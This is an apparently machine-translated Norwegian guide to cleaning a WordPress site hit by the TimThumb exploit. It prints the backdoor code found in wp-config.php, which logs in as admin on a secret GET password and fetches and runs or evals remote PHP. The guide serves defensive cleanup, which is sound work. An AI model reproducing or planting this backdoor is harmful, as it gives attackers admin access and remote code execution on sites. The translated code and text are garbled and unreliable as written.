Slik løser og rydder du TimThumb Hack i WordPress

Så hvis du husker riktig, var det et sikkerhetsproblem med TimThumb-skriptet i august, som ble løst. Men fortsatt til vår overraskelse bruker mange nettsteder fortsatt den gamle versjonen. Vi har fastsatt tre steder så langt i den siste måneden, en i går. Så det er fornuftig å bare skrive en trinnvis artikkel, slik at brukerne våre bare kan følge den. Alle de tre brukerne som vi fikser dette problemet for, visste ikke engang hva TimThumb var eller om de brukte det eller ikke.

TimThumb er et PHP-skript som tilpasser bildene. Det var et sårbarhet i det, men det er trygt å bruke nå.

Så hvordan vet du at nettstedet ditt er hacket? Hvis du ser en stor rød skjerm i nettleseren din når du besøker nettstedet ditt:

Hvis du begynner å bli bombardert med e-poster om brukere blir omdirigert fra nettstedet ditt. Sannsynligvis er saken at nettstedet ditt var et offer for denne utnyttelsen.

Som et forsiktighetsmål må alle bare bruke denne Timthumb Vulnerability Scanner. Dette vil fortelle deg om du bruker den eldre versjonen av TimThumb. Mange temaklubber oppgraderte kjernen sin med en gang. Så dette pluginet vil sjekke om den nye sikre versjonen av Timthumb er installert eller en eldre versjon er installert.

Nå hvis nettstedet ditt allerede ble byttet til denne Timthumb utnytte, så er her det du trenger å gjøre.

Først må du slette følgende filer:

/wp-admin/upd.php /wp-content/upd.php

Logg inn på WordPress admin panel og installer WordPress versjonen på nytt. Vi ser spesielt etter å installere disse filene på nytt:

 /wp-settings.php /wp-includes/js/jquery/jquery.js /wp-includes/js/110n.js 

Åpne deretter din wp-config.php hvor du mest sannsynlig finner denne store malware-koden som henter innloggingsinformasjon og informasjonskapsler. Denne koden vil være mot bunnen.

 hvis (isset ($ _ GET ['pingnow']) og& isset ($ _ GET ['pass'])) hvis ($ _GET ['pass'] == '19ca14e7ea6328a42e0eb13d585e4c22') hvis ($ _GET ['pingnow'] == 'logg inn') $ user_login = 'admin'; $ user = get_userdatabylogin ($ user_login); $ user_id = $ user-> ID; wp_set_current_user ($ user_id, $ user_login); wp_set_auth_cookie ($ user_id); do_action ('wp_login', $ user_login);  $ _GET ['pingnow'] == 'exec') && (isset ($ _ GET ['fil']))) $ ch = curl_init ($ _ GET ['fil']); $ fnm = md5 (rand (0,100)). 'php'; $ fp = fopen ($ fnm, "w"); curl_setopt ($ ch, CURLOPT_FILE, $ fp); curl_setopt ($ ch, CURLOPT_HEADER, 0); curl_setopt ($ ch, CURLOPT_TIMEOUT, 5); curl_exec ($ ch); curl_close ($ ch); fclose ($ fp); ekko "location.href = '$ fnm';";  ($ _GET ['pingnow'] == 'eval') && (isset ($ _ GET ['fil']))) $ ch = curl_init ($ _ GET ['fil']); curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, true); curl_setopt ($ ch, CURLOPT_HEADER, 0); curl_setopt ($ ch, CURLOPT_TIMEOUT, 5); $ re = curl_exec ($ ch); curl_close ($ ch); eval ($ re);  

I temaets mappe, se hvor som helst TimThumb-skriptet kan lagre de cached-filene. Vanligvis er de i denne strukturen:

 /wp-content/themes/themename/scripts/cache/external_MD5Hash.php /wp-content/themes/themename/temp/cache/external_MD5Hash.php 

Slett alt som ser slik ut. Hvis du ikke er sikker på ting, sletter du alt som ikke er en bildefil.

Neste ting du vil gjøre er å bytte ut timthumb.php med den nyeste versjonen, som du finner på http://timthumb.googlecode.com/svn/trunk/timthumb.php

Nå vil det være en god ide å endre passordene dine som starter med MySQL-påloggingsinformasjonen til din WordPress-påloggingsinformasjon. Ikke glem å endre passordet for MySQL i wp-config.php, eller du vil få "Feilsettingsforbindelse" -skjermbildet.

Endre de hemmelige nøklene i wp-config.php-filen. Du kan generere en ny nøkkel ved å gå til onlinegeneratoren.

Nå er du ferdig. Ikke glem å tømme alle sidekrypingsprogrammer. Som et forsiktighetsmål, er det godt å slette nettleserens cache og informasjonskapsler også.

For utviklere, prøv å bruke funksjonen ekstra bildestørrelser i WordPress for å erstatte funksjonene Timthumb.

Gi oss beskjed hvis du trenger ytterligere hjelp ved å bruke vårt kontaktskjema.